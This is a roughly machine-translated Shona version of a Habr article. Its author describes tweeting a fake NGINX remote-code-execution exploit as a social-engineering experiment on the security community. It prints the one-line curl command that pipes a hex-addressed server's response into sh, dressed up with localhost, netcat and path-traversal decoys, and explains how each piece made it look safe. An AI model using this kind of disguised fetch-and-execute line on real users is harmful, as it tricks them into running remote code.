Kubudirira kwekuyedza kushamwaridzana nekunyepedzera nginx exploit

Cherechedza. transl.: Munyori chinyorwa chepakutanga, chakaburitswa muna Chikumi 1, chakafunga kuita chiedzo pakati peavo vanofarira kuchengetedza ruzivo. Kuti aite izvi, akagadzirira kubiridzira kwekunyepedzera kwekunetseka kusingazivikanwe muwebhu server ndokuiisa pa Twitter yake. Mafungiro ake - kuti aburitswe pakarepo nenyanzvi dzaizoona hunyengeri huri pachena mukodhi - kwete chete hazvina kuitika ... Vakapfuura zvose zvinotarisirwa, uye nenzira yakasiyana: iyo tweet yakagamuchira rubatsiro rukuru kubva kuvanhu vakawanda vasina. tarisa zviri mukati maro.

TL; DR: Usashandise faira pipelining mu sh kana bash chero mamiriro ezvinhu. Iyi inzira huru yekutadza kutonga komputa yako.

Ini ndinoda kugovera newe nyaya pfupi nezve inosekesa PoC kushandiswa iyo yakagadzirwa muna Chivabvu 31st. Akaoneka nekukasira achipindura nhau kubva Alisa Esage Shevchenko, nhengo Zero Zuva Rokutanga (ZDI), iyo ruzivo rwekusagadzikana muNGINX inotungamira kuRCE (remote code execution) ichakurumidza kuburitswa. Sezvo NGINX ichipa mawebhusaiti akawanda, nhau dzinofanirwa kunge dzaive bhomba. Asi nekuda kwekunonoka mukuita "kuburitsa pachena" maitiro, ruzivo rwezvakaitika hazvina kuzivikanwa - iyi ndiyo yakajairwa ZDI maitiro.

Tweet nezvekusagadzikana kuburitswa muNGINX

Ndapedza kushanda panzira nyowani yekubiridzira mucurl, ndakatora iyo yekutanga tweet uye "ndakaburitsa PoC inoshanda" inosanganisira mutsara mumwe chete wekodhi uyo unofungidzirwa kuti unoshandisa njodzi yakawanikwa. Hongu, uku kwaive kusaziva zvachose. Ndakafunga kuti ndaizobva ndafumurwa, uye kuti zvakanaka ndaizowana akati wandei retweets (o zvakanaka).

Tweet ne fake exploit

Zvisinei, handina kukwanisa kufungidzira zvakazoitika. Mukurumbira wetitter yangu wakawedzera. Zvinoshamisa kuti panguva ino (15:00 Moscow nguva June 1) vanhu vashomanana vakaona kuti iyi inhema. Vanhu vazhinji vanoidzorerazve vasina kuitarisa zvachose (regai kungoyemura inoyevedza ASCII mifananidzo yainoburitsa).

Chingotarisai kunaka kwaro!

Nepo ese aya zvishwe uye mavara akanaka, zviri pachena kuti vanhu vaifanira kumhanya kodhi pamushini wavo kuti vazvione. Neraki, mabhurawuza anoshanda nenzira imwechete, uye akasanganiswa nenyaya yekuti ini ndaisada chaizvo kupinda mudambudziko remutemo, kodhi yakavigwa munzvimbo yangu saiti yaingoita echo mafoni pasina kuyedza kuisa kana kuita imwe kodhi yekuwedzera.

Digression diki: netspooky, dnz, ini nevamwe vakomana vechikwata Thugcrowd Isu tanga tichitamba nenzira dzakasiyana dzekubiridzira curl mirairo kwechinguva nekuti inotonhorera ... uye isu tiri ma geeks. netspooky uye dnz vakawana nzira nyowani dzinoverengeka dzaiita senge dzinovimbisa kwandiri. Ndakajoinha mumafaro ndikaedza kuwedzera IP decimal shanduko kubhegi remanomano. Zvinoitika kuti IP inogona zvakare kushandurwa kuita hexadecimal fomati. Uyezve, curl uye mamwe akawanda maturusi eNIX anofara kudya hexadecimal IPs! Saka yaingova nyaya yekugadzira mutsara wekuraira unogutsa uye wakachengeteka. Pakupedzisira ndakagadzirisa pane iyi:

curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost

Socio-electronic engineering (SEE) inopfuura phishing

Kuchengeteka uye kuzivana ndizvo zvaive chikamu chikuru chekuedza uku. Ndinofunga kuti ndivo vakaita kuti abudirire. Mutsara wekuraira wainyatso reva chengetedzo nekureva "127.0.0.1" (iyo inozivikanwa localhost). Localhost inoonekwa seyakachengeteka uye iyo data pairi haimbosiya komputa yako.

Kujairika yaive yechipiri kiyi ONA chikamu chekuyedza. Sezvo chinangwa chevateereri kunyanya chaive nevanhu vanoziva nheyo dzekuchengetedzwa kwekombiyuta, zvaive zvakakosha kugadzira kodhi kuitira kuti zvikamu zvayo zviite sezvinozivikanwa uye zvinozivikanwa (uye naizvozvo zvakachengeteka). Kukwereta zvinhu zvekare zvekushandisa pfungwa nekuzvibatanidza nenzira isina kujairika kwakaratidza kuve kwakabudirira zvikuru.

Pazasi pane kuongororwa kwakadzama kweiyo-liner. Zvese zviri pachirongwa ichi zvinopfeka cosmetic nature, uye hapana chinodiwa pakushanda kwayo chaiko.

Ndezvipi zvinoriumba zvinonyatsodiwa? Izvi -gsS, -O 0x0238f06a, |sh uye web server pachayo. Iyo webhu server yanga isina chero mirairo yakaipa, asi yaingoshanda ASCII mifananidzo uchishandisa mirairo echo mune script irimo index.html. Kana mushandisi akapinda mutsetse ne |sh pakati, index.html akaremerwa uye akaurayiwa. Neraki, vachengeti vewebhu server vaive vasina vavariro dzakaipa.

• ../../../%00 - inomiririra kupfuura dhairekitori;
• ngx_stream_module.so - nzira yekuenda kune isingaite NGINX module;
• /bin/sh%00<'protocol:TCP' - isu tinofanirwa kutanga /bin/sh pamushini wakanangwa uye tungamira zvinobuda kuTCP chiteshi;
• -O 0x0238f06a#PLToffset - chinhu chakavanzika, chakawedzerwa #PLToffset, kuita senge memory offset neimwe nzira iri muPLT;
• |sh; - chimwe chikamu chakakosha. Taifanira kutungamira zvakabuda ku sh/bash kuitira kuti tiite kodhi inouya kubva kune inorwisa webhu server iri pa. 0x0238f06a (2.56.240.x);
• nc /dev/tcp/localhost - dummy umo netcat inoreva /dev/tcp/localhostkuitira kuti zvinhu zvose zvionekwe zvakachengeteka zvakare. Muchokwadi, haaiti chinhu uye inosanganisirwa mumutsara werunako.

Izvi zvinopedzisa kudhindwa kweiyo-line script uye nhaurirano yezvikamu zve "socio-electronic engineering" (yakaoma kunzwisisa phishing).

Web Server Configuration uye Countermeasures

Sezvo ruzhinji rwevanyoreri vangu vari infosec / hackers, ndakasarudza kuita kuti sevha yewebhu isanyanya kupikisa kutaura kwe "kufarira" padivi pavo, kuitira kuti vakomana vave nechimwe chinhu chekuita (uye zvingave zvinonakidza gadzirira). Ini handisi kuzonyora zvipingaidzo zvese pano sezvo kuyedza kuchiri kuenderera, asi hezvino zvinhu zvishoma zvinoitwa neserver:

• Inonyatso tarisa kuedza kwekugovera pane mamwe masocial network uye inotsiva akasiyana ekuona zvigunwe kukurudzira mushandisi kudzvanya pane chinongedzo.
• Redirect Chrome/Mozilla/Safari/etc kuThugcrowd promotional video pane kuratidza shell script.
• Mawadhi e OBVIOUS zviratidzo zvekupindirwa/kubira zviri pachena, obva atanga kuendesa zvikumbiro kumaseva eNSA (ha!).
• Inoisa Trojan, pamwe neBIOS rootkit, pamakomputa ese ane vashandisi vanoshanyira mugadziri kubva kune akajairwa browser (kungotamba!).

Chikamu chiduku che antimers

Muchiitiko ichi, chinangwa changu chega chaive chekuziva zvimwe zveApache - kunyanya, iyo inotonhorera mitemo yekudzosera zvikumbiro - uye ndakafunga: nei?

NGINX Shandisa (Chaiyo!)

Nyorera kune @alisaesage pa Twitter uye uteedzere basa guru reZDI mukugadzirisa kusasimba chaiko uye kushandisa mikana muNGINX. Basa ravo ragara richindinakidza uye ndinotenda Alice nekushivirira kwake nezvese kutaurwa uye zviziviso zvakakonzeresa tweet yangu. Neraki, yakaitawo zvimwe zvakanaka: yakabatsira kusimudza ruzivo rwekusagadzikana kweNGINX, pamwe nematambudziko anokonzerwa nekushungurudzwa kwe curl.

Source: www.habr.com